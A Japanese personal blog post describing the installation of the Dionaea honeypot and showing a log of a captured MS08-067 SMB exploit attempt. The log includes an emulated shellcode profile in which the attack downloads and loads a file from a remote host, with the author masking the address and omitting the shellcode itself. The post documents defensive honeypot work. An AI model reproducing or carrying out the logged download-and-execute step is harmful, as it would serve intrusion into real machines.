higefoxの公開メモ

2012-02-19

ハエトリグサの植え方

nepenthes(ウツボカズラ) という意味を覚えられたのは、このハニポのおかげです。
5年ぶりぐらいにインストールしようかと思ったら、自ら時代遅れを宣言したのですね。

Nepenthes is outdated
Do not use Nepenthes, use Dionaea instead.


◆Nepenthes - finest collection -
 <http://nepenthes.carnivore.it/>

Nepenthes が代わりに使えと勧める dionaea(ハエトリグサ)です。


■ 概要
Nepenthes の後継で、IPv6への対応や、libemu を用いたshellcodes への対応など行われたローインタラクション型のハニーポットです。


■ 材料
本日、用意した環境は次のとおりです。
Ubuntu 10.4.1 LTS Japanese Edition on ESXi 5.0
お客様用ネットワーク(データ通信カード)


■ 植え方
Web Pageに記載があるので、そのままインストールを続行します。
コンパイルばかりで少々面倒ですが、入ってしまえばこっちのものです。
◆dionaea catches bugs
 <http://dionaea.carnivore.it/>

日本でもインストールされている方がいらっしゃていますので、こちらのページを参考にされるのもありです。
◆Knowledge Base -kzhr1300-
 <http://www.kzhr1300.com/wiki/?Security%2FHoneypot%2Fdionaea>


■ 動作
こんな感じです。
URL とシェルコードは隠しています。

[19022012 19:03:43] SMB dionaea/smb/smb.py:445: readcount 0 len(rdata.Bytes) 68
[19022012 19:03:43] rpcservices dionaea/smb/rpcservices.py:76: Calling SRVSVC NetPathCompare (20) maybe MS08-67 exploit?
[19022012 19:03:44] SMB dionaea/smb/smb.py:405: got header
[19022012 19:03:44] SMB dionaea/smb/smb.py:407: FragLen 72 len(self.buf) 72
[19022012 19:03:44] SMB dionaea/smb/smb.py:592: Found a registered UUID (4b324fc8-1670-01d3-1278-5a47bf6ee188). Accepting Bind for SRVSVC
[19022012 19:03:45] SMB dionaea/smb/smb.py:434: MaxCountLow 1024 len(outbuf) 68 readcount 0
[19022012 19:03:45] SMB dionaea/smb/smb.py:445: readcount 0 len(rdata.Bytes) 68
[19022012 19:03:45] emu detect.c:160: shellcode found offset 254
[19022012 19:03:45] rpcservices dionaea/smb/rpcservices.py:76: Calling SRVSVC NetPathCanonicalize (1f) maybe MS08-67 exploit?
[19022012 19:03:45] rpcservices dionaea/smb/rpcservices.py:85: DCERPCValueError path is too long (b'\\\x00huLocuocHsvZVTdHJKhnyDOSukFfHvBTIQUPDMMfjSVifPsGoIabXt
シェルコード(?)なので省略

xebZAGFSYNESDC\x00\x00')
[19022012 19:03:45] SMB dionaea/smb/smb.py:135: faint death.
[19022012 19:03:45] emu dionaea/emu.py:53: profiledump [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['', 'http://XX.XXX.XXX.XXX:XXXX/dsill’, 'x.', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '0x00000000', 'args': ['x.'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['0'], 'call': 'ExitThread'}]
SplitResult(scheme='http', netloc='XX.XXX.XXX.XXX:XXXX', path='/dsill', query='', fragment='')
[19022012 19:03:45] logsql dionaea/logsql.py:708: offer for attackid 81
[19022012 19:03:45] logsql dionaea/logsql.py:699: emu profile for attackid 81
[19022012 19:03:48] connection connection.c:4337: connection 0xa1a9d20 accept/tcp/established [192.168.0.250:445->XX.XXX.XXX.XXX:XXXX] state: established->close
[19022012 19:03:49] curl module.c:202: DOWNLOAD DONE: http://XX.XXX.XXX.XXX:XXXX/dsill => (0)
[19022012 19:03:49] logsql dionaea/logsql.py:716: complete for attackid 81
[19022012 19:03:49] logsql dionaea/logsql.py:689: attackid 81 is done

投稿したコメントは管理者が承認するまで公開されません。

スパム対策のためのダミーです。もし見えても何も入力しないでください
ゲスト


画像認証

トラックバック - http://d.hatena.ne.jp/higefox/20120219/1329650002
リンク元